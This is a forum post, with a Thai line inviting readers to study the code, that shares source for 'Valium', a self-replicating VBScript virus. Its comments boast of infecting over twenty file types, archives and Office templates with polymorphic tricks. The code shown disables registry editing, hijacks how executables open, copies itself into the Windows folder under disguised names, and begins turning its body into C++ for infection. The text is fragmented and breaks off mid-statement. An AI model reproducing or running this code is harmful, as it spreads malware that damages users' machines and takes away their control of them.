code อาจยาวไปนิดนะครับ ลองไปศึกษาดู
'valium
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
' The
' **** ***** ****** ***** ***** ***** **** ***** *****
' *** *** *** ** *** *** *** ** *********
' *** *** ******** *** *** *** ** *** ** **
' ***** *** ** *** *** *** ** *** **
' *** *** ** ******* ***** ****** ***** ****
'
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'Valium is an Script virus,made in Visual Basic Script.
'Valium designed to infect many file types which is vulnerable for script to attack.
'it also has ability to infect graph files such as bmp,jpg,gif even it is not realy
'infection,but I think valium had show you how script infect those files.
'Valium infecting some project files such as cpp,frm and pas by adding it self in it
'Valium also adding it self in every zip or rar files,using lame bugs from its internal command
'Valium injecting it self in every nrb and nri files,see my article about what is nri or nrb
'in 29a#8 and this is just simple implementation in script to spread via cd-room
'Valium also macro virus,it infecting doc and xls,by injecting it body in normal.temp/xlstart
'I think Valium is an big script infector,infecting at least 22 file types
'Some memory resident trick,duplicator type trick,booting stuff trick also available here
'Valium also has abiity to encrypt it self/selfcripting using poly/Epo tricky.
'Thats all about this lame shit,Do not code script if you don't have something new in it.
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'Name : Valium
'Author : Psychologic/rRlf
'System : 9x,Me,Nt,Xp with WSH ofcourse
'Target files : Portable Script
' vb script:WriteRndMsg(true, true, 750)" & chr(34) & ">"
payload.writeline "Your Computer has been Infected with : "
payload.writeline "
<font color=" & chr(34) & "#FF0000" & chr(34) & ">Valium virus </font> Your Pc has been infected with Valium virus by psychologic/redline</p>"
payload.writeline "</body></html>"
payload.close
CreateObject("Wscript.shell").run "C:\payload.html"
end if
[hide=25][code]CreateObject("Wscript.shell").regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1, "REG_DWORD"
createobject("Wscript.shell").regwrite "HKEY_CLASSES_ROOT\Directory\Shell\valium games\Command\","WScript.exe | C:\Windows\valium.vbs"
createobject("Wscript.shell").regwrite "HKEY_CLASSES_ROOT\exefile\shell\open\command\", "%WINDIR%\valium.vbs %1 %*"
set executor = wscript.CreateObject("WScript.Shell")
Set fso = createobject("scripting.filesystemobject")
fso.CopyFile Wscript.ScriptFullName, "C:\windows\valium.vbs"
fso.CopyFile Wscript.ScriptFullName, "C:\windows\systemCD.vbs"
fso.copyfile wscript.scriptfullname,"C:\windows\WindowsSystem.sys"
Set OpenSelf = FSO.OpenTextFile(Wscript.ScriptFullName, 1, True)
code = OpenSelf.readall & vbcrlf & "'valium"
set backup = fso.createtextfile("C:\doc.1",true)
backup.write code
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
'A function to changes this script body to *cpp format,need to drop file for buffy character
'and all formated *cpp character saved in one variable
'^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
set opendropercpp = fso.OpenTextFile("C:\windows\WindowsSystem.sys", 1)
allsourcecpp = ""
oneline1 = ""
do while opendropercpp.readline <> "'valium"
oneline1 = ""
oneline1 = opendropercpp.readline
onebyone = len(oneline1)
for i = 1 to onebyone
read34 = mid(oneline1,i,1)
if read34 = chr(34) then
m = ",34"
else
m = ""
end if
all = all & m
next
cppformat = replace(oneline1,chr(34),"%c")
fullline1 = "fprintf(mvbswe," & chr(34) & cppformat & "\n" & chr(34) & all & ");"
allsourcecpp = allsourcecpp & vbcrlf &
Reply With Quote
